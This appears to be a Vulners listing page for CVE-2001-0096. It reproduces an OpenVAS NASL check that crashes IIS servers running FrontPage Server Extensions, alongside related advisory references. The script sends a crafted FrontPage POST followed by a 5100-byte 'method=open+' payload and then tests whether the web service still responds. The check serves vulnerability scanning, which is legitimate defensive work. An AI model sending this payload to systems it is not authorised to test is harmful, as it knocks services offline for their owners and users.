| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2001-0096 | 7 May 200104:00 | – | cve | |
| CVE-2001-0096 | 7 May 200104:00 | – | cvelist | |
| Microsoft IIS Frontpage Server Extensions (FPSE) Malformed Form DoS | 22 Jul 200300:00 | – | nessus | |
| CVE-2001-0096 | 12 Feb 200105:00 | – | nvd | |
| IIS FrontPage DoS | 3 Nov 200500:00 | – | openvas |
| Source | Link |
|---|---|
| docs | www.docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-100 |
| securityfocus | www.securityfocus.com/bid/2144 |
# SPDX-FileCopyrightText: 2000 John Lampe
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:microsoft:internet_information_services";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10585");
script_version("2025-04-11T05:40:28+0000");
script_tag(name:"last_modification", value:"2025-04-11 05:40:28 +0000 (Fri, 11 Apr 2025)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_cve_id("CVE-2001-0096");
script_name("Microsoft Internet Information Services (IIS) FrontPage DoS");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2000 John Lampe");
script_family("Denial of Service");
script_dependencies("gb_microsoft_iis_http_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("IIS/installed");
script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");
script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-100");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2144");
script_tag(name:"summary", value:"Microsoft IIS, running Frontpage extensions, is vulnerable
to a remote DoS attack usually called the 'malformed web submission' vulnerability.");
script_tag(name:"impact", value:"An attacker, exploiting this vulnerability, will be able to
render the service unusable. If this machine serves a business-critical functionality, there
could be an impact to the business.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("http_func.inc");
include("http_404.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE, service:"www" ) )
exit( 0 );
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit( 0 );
filenames = make_list();
if( http_is_cgi_installed_ka( item:"/_vti_bin/shtml.dll/_vti_rpc", port:port ) ) {
filenames = make_list( filenames, "shtml.dll/_vti_rpc" );
}
if( http_is_cgi_installed_ka( item:"/_vti_bin/_vti_aut/author.dll", port:port ) ) {
filenames = make_list( filenames, "_vti_aut/author.dll" );
}
foreach filename( filenames ) {
soc = http_open_socket( port );
if( ! soc ) continue;
url = "/_vti_bin/" + filename;
req = string("POST ", url, " HTTP/1.1\r\n",
"MIME-Version: 1.0\r\n",
"User-Agent: MSFrontPage/4.0\r\n",
"Host: %25VTTEST%25\r\n",
"Accept: auth/sicily\r\n",
"Content-Length: 5058\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"X-Vermeer-Content-Type: application/x-www-form-urlencoded\r\n",
"Connection: Keep-Alive\r\n\r\n");
send( socket:soc, data:req );
res = http_recv( socket:soc );
find_ms = egrep( pattern:"^Server.*IIS.*", string:res );
if( find_ms ) {
req2 = string("\r\n\r\n" , "method=open+", crap(length:5100 , data:"A"), "\r\n\r\n");
send( socket:soc, data:req2 );
http_close_socket( soc );
} else {
http_close_socket( soc );
exit( 0 );
}
soc = http_open_socket( port );
req = http_get( item:"/", port:port );
send( socket:soc, data:req );
http_close_socket( soc );
soc = http_open_socket( port );
send( socket:soc, data:req );
res = recv_line( socket:soc, length:1024 );
http_close_socket( soc );
find_200 = egrep( pattern:".*200 *OK*", string:res );
if( ! find_200 ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation